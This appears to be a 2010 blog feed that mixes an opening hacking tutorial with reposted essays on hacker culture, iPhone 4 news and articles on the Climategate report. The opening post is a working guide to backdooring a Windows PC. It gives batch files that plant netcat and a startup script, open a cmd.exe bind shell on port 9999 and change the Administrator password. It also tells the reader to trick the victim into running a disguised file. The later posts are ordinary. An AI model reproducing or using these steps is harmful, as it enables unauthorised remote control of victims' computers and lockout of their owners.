As we all know, a Trojan is very likely to be picked up by AV, what you need is Netcat, netcat opens a port on a computer for access (If used correctly by a batch file you open a port on a target computer). You will need to write a batch file. The batch file to copy netcat on the remote computer will have to be run from the target computer (The person on the target will have to execute the batch file in some way). Open Notepad and type this in:
Code:

@echo off

cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe (just to be sure)
cd "Documents and Settings"
cd "All Users"
cd "Start Menu"
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Save the file as a batch file using Notepad.

The next batch file will be used to make sure the port you specified opens up every time windows starts up, you can specify any port you wish. Open Notepad and type:

@echo off

cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Save the file as a batch file using Notepad, this will be the file that is copied into the startup folder in the previous batch file we wrote. You can bind the batch file to another file and share that file, let the target execute that file so that he can copy netcat and the other batch file onto his/hers computer thus opening port 9999, after port 9999 has been opened you can then use telnet and telnet to that port on the target computer to have full access without ever needing any passwords of any sort. After you are in change the Administrator password for if something happens to your files, the command is this:

net user Administrator newpassword

Now from here you can do what you want, e.g try shutting down the target computer by browsing to his system32 folder and then type in:

shutdown -r -t 10 -c "Hello"

the computer will then restart in 10 seconds time. You can even play around more by Installing Cain & Abel on your computer and then installing Abel remotely on his computer (Since you know the Administrator password) Once you have Abel on the target you can start and stop services and do more!

Enjoy.

What do hackers do with the information they steal?

noreply@blogger.com (Eracnid Mitnick) — Sun, 05 Sep 2010 19:49:00 +0000

What do hackers do with the information they steal?

A question that we hear a lot when it comes to cyber-crime: What are hackers after, anyways?
There are a lot of different types of hackers and computer scammers out there, so there’s no one answer. Some of them are just practical jokers, some use viruses to get revenge on the company they were fired from, or just to bother random people online. The main reason hacking exists, however, is that it’s a great way to make a dishonest living by stealing information from unsuspecting users.

If you have the know how, the time, and the lack of moral scruples, it’s really not that hard to crack into someone’s computer with a spybot and monitor their activity, or even to take control of their computer from afar and look right into their files.

So now the question becomes “Why?” Why do hackers want that information so badly?
There are a number of things a hacker can do with the information they steal from you. The most obvious example would be, of course, that they can steal your financial information or your identity, using your credit card number to buy whatever they like or even getting into your bank account.

That’s the scariest kind of hacker, anyways, but even if you don’t have any of your financial information on your PC, you’re still a target for info and identity theft.

Besides outright stealing your identity and spending your hard earned money for you, many hackers will settle for some more mundane details, such as using spyware to look at your browser history, email, internet proxy, anything they can get ahold of, and then selling that to unscrupulous advertisers who flood your inbox with spam and fill your screen with pop ups.

Back when computers were more of a hobby than a serious part of one’s every day life, we really didn’t have much info on our PCs worth stealing. In those days, viruses were relatively benign. Maybe they’d make your computer do something weird, maybe pop up an image or a message, like THE CREEPER, the first computer virus, which simply made your computer monitor read “I’M THE CREEPER, CATCH ME IF YOU CAN”, for the most part, they were harmless practical jokes.

There still are those practical joker hackers out there, but what hacking has largely become is an illegal multimillion dollar a year industry, a great way for con artists to make a quick buck without even having to put themselves at risk by lying to your face.

The bottom line is that hackers want money, and they don’t care how they get it. If they can take your bank account information, they will, and if they can’t, they’ll settle for some personal info to sell to spammers.
Luckily, a good security program will generally protect you from most hackers, but they’re working ‘round the clock to figure out how to bypass your security measures, how to find new weak points, so it’s important that the methods you use to protect yourself evolve at a faster pace than that of the hacker’s methods.

iPhone 4 Coming to India in October

noreply@blogger.com (Eracnid Mitnick) — Mon, 19 Jul 2010 17:11:00 +0000

iPhone 4 Coming to India in October: "

If you are looking to buy the latest iPhone 4 in India through the official channels, you might have to wait until Diwali.

An Airtel executive recently confirmed to Reuters that the company is planning to launch iPhone 4 in India but around the September or October timeframe.

There’s no mention of price but it will obviously cost you more than a mid-range laptop. It is also not known if Apple / Airtel will offer free bumpers to iPhone 4 owners in India like they are do in the U.S. to fix the antenna related issues.

Vodafone, the only other cellular operator that sells the iPhone in India, has not confirmed their own launch dates yet.

If you want an iPhone 4 now and don’t mind paying the premium, there’s always the unofficial route – buy a locked iPhone 4 from US and jailbreak it on your own or get one from either the UK or Canada. Apple is selling unlocked iPhones in these countries and therefore they’ll work out-of-the-box with any GSM SIM.

Before you begin to learn-Hacking

noreply@blogger.com (Eracnid Mitnick) — Tue, 13 Jul 2010 18:59:00 +0000

Before you begin to learn-Hacking You need to learn few important points :

1. The world is full of fascinating problems waiting to be solved.

Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.

If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval.

(You also have to develop a kind of faith in your own learning capacity — a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece — and so on, until you're done.)
2. No problem should ever have to be solved twice.

Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.

To behave like a hacker, you have to believe that the thinking time of other hackers is precious — so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.

Note, however, that "No problem should ever have to be solved twice." does not imply that you have to consider all existing solutions sacred, or that there is only one right solution to any given problem. Often, we learn a lot about the problem that we didn't know before by studying the first cut at a solution. It's OK, and often necessary, to decide that we can do better. What's not OK is artificial technical, legal, or institutional barriers (like closed-source code) that prevent a good solution from being re-used and force people to re-invent wheels.

(You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get most respect from other hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's fine to use your hacking skills to support a family or even get rich, as long as you don't forget your loyalty to your art and your fellow hackers while doing it.)
3. Boredom and drudgery are evil.

Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do — solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil.

To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).

(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice — nobody who can think should ever be forced into a situation that bores them.)
4. Freedom is good.

Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by — and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers.

(This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.)

Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing — they only like ‘cooperation’ that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.
5. Attitude is no substitute for competence.

To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.

Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence — especially competence at hacking, but competence at anything is valued. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best.

If you revere competence, you'll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.

The Hacker Attitude

noreply@blogger.com (Eracnid Mitnick) — Tue, 13 Jul 2010 18:57:00 +0000

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.

But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things is important for you — for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters — not just intellectually but emotionally as well.

Or, as the following modern Zen poem has it:

To follow the path:
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.

So, if you want to be a hacker, repeat the following things until you believe them:

What Is a Hacker?

noreply@blogger.com (Eracnid Mitnick) — Tue, 13 Jul 2010 18:57:00 +0000

What Is a Hacker?

The Jargon File contains a bunch of definitions of the term ‘hacker’, most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how to become a hacker, though, only two are really relevant.

There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term ‘hacker’. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you're a hacker.

The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music — actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them ‘hackers’ too — and some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term ‘hacker’.

There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people ‘crackers’ and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word ‘hacker’ to describe crackers; this irritates real hackers no end.

The basic difference is this: hackers build things, crackers break them.

If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding out you aren't as smart as you think you are. And that's all I'm going to say about crackers.

'Climategate' report: the main points

noreply@blogger.com (Eracnid Mitnick) — Sat, 10 Jul 2010 18:50:00 +0000

From manipulating data to censoring articles, 150-page report clears scientists of main allegations against them
Was it the greatest scandal in modern science or a storm in a teacup whipped up by climate sceptics and an uncritical media? The report from a panel of experts led by Sir Muir Russell into the 'climategate' affair that saw thousands of personal emails from global warming scientists released on to the internet was eagerly awaited by all sides.
The report, which effectively cleared the scientists of the most serious charges – including deliberately fudging climate change results, is unlikely to be the final word on the matter, as the University of East Anglia and the beleaguered director of its Climatic Research Unit, Phil Jones, would have hoped.
As the panel noted: 'Emails are rarely definitive evidence of what actually occurred.' Those who argue that climate change is a conspiracy of crooked scientists will find little problem in labelling the latest vindication a whitewash. But the panel's report, which runs to some 150 pages, covers in detail the main allegations made against the scientists.

Temperature data

One of the most common allegations made against the CRU scientists was that they blocked access to raw data, drawn from weather stations around the world, and adjusted that data to falsely show a pattern of global warming. There were also complaints that they failed to release on demand the computer code they wrote to analyse the data. Without such information, how could sceptics check the CRU's calculations?
The panel showed that it was relatively straightforward to reproduce the CRU analysis without needing to ask Jones and his colleagues for anything.
They used data from public databanks and wrote their own computer code, which they say could be repeated by any 'competent researcher'. The results were similar to those of the CRU.
Their conclusion: 'A researcher can evidently produce a study which would test the CRU analysis quite precisely, without requiring any information from CRU to do so.'
To repeat, rather than reproduce, the CRU findings would require the CRU code and the list of weather stations it used to source the raw data. Such requests were made under freedom of information laws. The panel criticised the CRU response as 'unhelpful and defensive'.
On specific allegations of malpractice by Jones in the handling of weather station data from China, the panel did not comment directly, but concluded more generally: 'Crucially, we find nothing in the behaviour on the part of CRU scientists that is the subject of allegations ... to undermine the validity of their work.'

Peer review and IPCC

The CRU scientists were accused of abusing their positions to unfairly and improperly skew the process of scientific publication, to censor articles that criticised their own work or questioned their view of climate change. The panel analysed three cases in detail; it could not find enough evidence to judge a fourth.
In the three cases examined, the panel said that none 'represents subversion of the peer review process nor unreasonable attempts to influence the editorial policy of journals'. Comments that critics may view as 'partial and aggressive' were more likely to represent 'the rough and tumble of interaction in an area of science that has become heavily contested and where strongly opposed and aggressively expressed positions have been taken up on both sides'.
Climate science is not unusual in this regard, it said, and areas such as medicine see similar strongly worded disputes.
Because the CRU scientists were heavily involved in the work of the Intergovernmental Panel on Climate Change (IPCC), that climate body's reports also came under fire. Again, the criticism was that CRU scientists had squashed dissent. Again, the panel dismissed the allegations. The IPCC text was a team responsibility, it said, and there was no improper exclusion of material.

Proxy reconstructions

The CRU scientists were world leaders in a branch of science that uses tree rings and other evidence from the natural world to reconstruct temperatures in the distant past, before records were kept or instruments such as thermometers were available.
This led to a barrage of allegations, from suppression of data to questionable selection of data points. The panel effectively cleared the CRU scientists, with qualifications. Data on which CRU work depended should have been better archived, it said. But the panel found no evidence of exclusion of rival temperature series that would have shown a different result.
The CRU scientists were, however, criticised for producing a 'misleading' figure for the front cover of a 1999 report from the World Meteorological Organisation. The figure, discussed in a much quoted email from Jones in which he used a 'trick' to 'hide the decline', spliced together proxy temperature data and instrument data. This was a valid technique but should have been better labelled, the panel said. It accepted there was no deliberate intent to mislead, as the full explanation was included in the report text.

Transparency

The email saga is popularly thought to have begun as a reaction to the CRU's apparent unwillingness to release data and codes requested by a range of people under freedom of information laws. Jones and his colleagues may now regret that attitude.
The panel strongly criticised the actions of the CRU scientists towards such requests, and the broader university administration. There was a 'lack of engagement' and 'confusion' over how to handle such requests. Scientists and senior university officials failed to recognise that early disclosure of the requested information could have minimised the problems. Many of the responses that were made were unhelpful, or incomplete.
Some emails were deleted to avoid future release, though the panel pointed out this was allowed under FOI rules. Deleting information specifically requested is not allowed, but there was no evidence the CRU did this. 'We recognise that there was deep suspicion within CRU as to the motives of those making detailed requests,' the panel said. 'Nonetheless, the requirements of the legislation for release of information are clear and early action would likely have prevented much subsequent grief.'
On a wider point, it noted there was an ongoing 'transformation in the need for openness in the culture of publicly funded science', driven partly by changes in the law and the rise of internet bloggers.
Without such openness, the panel warned, 'the credibility of their work will suffer because it will always be at risk of allegations and hence malpractice'.
It added: 'We note that much of the challenge to CRU's work has not always followed the conventional scientific method of checking and seeking to falsify conclusions or offering alternative hypotheses for peer review and publication. We believe this is necessary if science is to move on, and we hope that all those involved in all sides of the climate science debate will adopt this approach.'

Climategate scientists cleared of manipulating data on global warming

noreply@blogger.com (Eracnid Mitnick) — Sat, 10 Jul 2010 18:49:00 +0000

Climategate scientists cleared of manipulating data on global warming: "

Muir Russell report says scientists did not fudge data, but they should have been more open about their work

• Read the full text of the review here
• 'Climategate' report - main findings

The climate scientists at the centre of a media storm over leaked emails were yesterday cleared of accusations that they fudged their results and silenced critics, but a review found they had failed to be open enough about their work.

Sir Muir Russell, the senior civil servant who led a six-month inquiry into the affair, said the 'rigour and honesty' of the scientists at the Climatic Research Unit (CRU) at the University of East Anglia (UEA) were not in doubt. His investigation concluded they did not subvert the peer review process to censor criticism and that key data was freely available and could be used by any 'competent' researcher.

But the panel said the scientists' responses to 'reasonable requests for information' had been 'unhelpful and defensive'. The inquiry found 'emails might have been deleted in order to make them unavailable should a subsequent request be made for them' and that there had been 'a consistent pattern of failing to display the proper degree of openness'. Scientists also failed to appreciate the risk their lack of transparency posed to the university and 'indeed to the credibility of UK climate science'.

The controversy began when 13 years of emails from CRU scientists were released online last year. Climate change sceptics claimed they showed scientists manipulating and suppressing data to back up a theory of manmade climate change. Critics also alleged the scientists abused their positions to cover up flaws and distort the peer review process that determines which studies are published in journals, and so enter the scientific record. Some alleged the emails cast doubt on the findings of the Intergovernmental Panel on Climate Change (IPCC).

Announcing the findings, Russell said: 'Ultimately this has to be about what they did, not what they said. The honesty and rigour of CRU as scientists are not in doubt ... We have not found any evidence of behaviour that might undermine the conclusions of the IPCC assessments.'

The review is the third and final inquiry into the email affair, and effectively clears Professor Phil Jones, head of the CRU, and his colleagues of the most serious charges. Questions remain over the way they responded to requests for information from people outside the conventional scientific arena, some of whom were critics of Jones. 'We do find that there has been a consistent pattern of failing to display the proper degree of openness, both on the part of CRU scientists and on the part of the UEA,' said the report, commissioned by UEA at a cost of £200,000.

It also criticised the CRU scientists for failing to include proper labels on a 1999 graph prepared for the World Meteorological Organisation, which was the subject of an infamous email about Jones using a 'trick' to 'hide the decline'. The panel said the result was misleading, though they accepted this was not deliberate as the necessary caveats had been included in the report text.

Acknowledging that the digital age brought a greater demand for openness and access to data, it concluded 'like it or not, this indicates a transformation in the way science has to be conducted in this century.' Edward Acton, vice-chancellor of UEA, said the university accepted the report's conclusion that it should have been more open. 'The need to develop a culture of greater openness and transparency in CRU is something we faced up to internally some months ago and we are already working to put right.'

He hoped the review would 'finally lay to rest conspiracy theories, untruths and misunderstandings' that had been circulating, and that the 'wilder assertions' about the climate science community would now stop.

Jones issued a statement which said: 'I am, of course, extremely relieved that this review has now been completed. We have maintained all along that our science is honest and sound and this has been vindicated now by three different independent external bodies. There are lessons to be learned and I need time to reflect on them.' Jones is to be director of research at CRU. Acton said this was 'not a demotion but a shift in emphasis of role'.

Ed Miliband, the former climate change secretary, said: 'Muir Russell has given the world a clear message: we should not believe those who tell us that one string of emails undermines years of climate science. We should also learn lessons because maximum openness and transparency is the best weapon against those who want us to stick our heads in the sand as if climate change isn't happening. Now the world needs to step up the momentum again and get the deal that eluded us at Copenhagen.'

Writing on Comment is Free, Dr Richard Horton, editor of the Lancet, who testified to the inquiry, said: 'The Russell review has rejected all claims of serious scientific misconduct. But he does identify failures, evasions, misleading actions, unjustifiable delays, and pervasive unhelpfulness – all of which amounts to severely sub-optimal academic practice. Climate science will never be the same again.'

Bob Ward of the Grantham Research Institute on Climate Change and the Environment, said: 'It is clear that greater transparency is required in climate research because of the intense public interest in it, and its profound implications for society. However, it is also now very apparent that many so-called sceptics owe a huge apology to the public for having presented the email messages as evidence that climate change is a hoax carried out by a conspiracy of dishonest scientists.'

Acton said: 'CRU will be more closely integrated in the bigger school of environmental sciences and a key difference is to place some of the administrative burden that Phil had before this incident on the head of the school.'

Bob Watson, chief scientific advisor to the department of environment, food and rural affairs, said that while it was clear scientists needed to be more transparent, he hoped the report would 'draw a line under this episode so that the scientific community can begin to regain the trust of the public and continue to do its vital work on climate change, which remains one of the biggest challenges we face as a planet.'

Myles Allen, head of the climate dynamics group at the University of Oxford, said: 'What everyone has lost sight of is the spectacular failure of mainstream journalism to keep the whole affair in perspective. Again and again, stories are sexed up with arch hints that these 'revelations' might somehow impact on the evidence for human impact on climate. Yet the only error in actual data used for climate change detection to have emerged from this whole affair amounted to a few hundredths of a degree in the estimated global temperature of a couple of years in the 1870s.'